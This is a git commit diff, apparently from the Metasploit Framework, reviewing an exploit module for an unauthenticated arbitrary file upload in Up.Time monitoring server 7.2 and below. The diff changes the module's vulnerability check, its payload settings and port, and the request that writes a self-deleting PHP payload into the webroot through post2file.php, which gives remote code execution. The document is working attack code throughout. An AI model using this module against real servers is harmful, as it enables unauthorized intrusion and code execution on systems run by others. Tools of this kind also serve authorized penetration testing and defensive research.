Merge pull request #1 from jvazquez-r7/review_2723

denandz · denandz · commit 3ed293a1d0f0 · 2013-12-06T15:29:15.000-08:00
Review uptime_file_upload
diff --git a/modules/exploits/multi/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb
@@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Up.Time Monitoring post2file.php Arbitrary File Upload',
+      'Name'           => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
       'Description'    => %q{
-          This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server
-          7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading
-          to arbitrary code execution.
+          This module exploits an arbitrary file upload vulnerability found within the Up.Time
+          monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
+          webroot without authentication, leading to arbitrary code execution.
       },
       'Author'         =>
         [
@@ -27,11 +27,14 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf']
+          [ 'OSVDB', '100423' ],
+          [ 'BID', '64031'],
+          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
         ],
       'Payload'            =>
         {
-          'BadChars' => "\x00"
+          'Space' => 10000, # just a big enough number to fit any PHP payload
+          'DisableNops' => true
         },
       'Platform'       => 'php',
       'Arch'         => ARCH_PHP,
@@ -42,7 +45,10 @@ def initialize(info = {})
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Nov 19 2013'))
 
-    register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class)
+    register_options([
+      OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
+      Opt::RPORT(9999)
+    ], self.class)
   end
 
   def check
@@ -53,7 +59,7 @@ def check
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
     })
 
-    if res and res.code == 200
+    if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
       return Exploit::CheckCode::Appears
     end
 
@@ -66,7 +72,7 @@ def exploit
     uri =  target_uri.path
 
     @payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self=>true)
+    php_payload = get_write_exec_payload(:unlink_self => true)
 
     post_data = ({
       "file_name" => @payload_name,
@@ -79,7 +85,8 @@ def exploit
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
       'vars_post'   => post_data,
     })
-    unless res and res.code == 200
+
+    unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
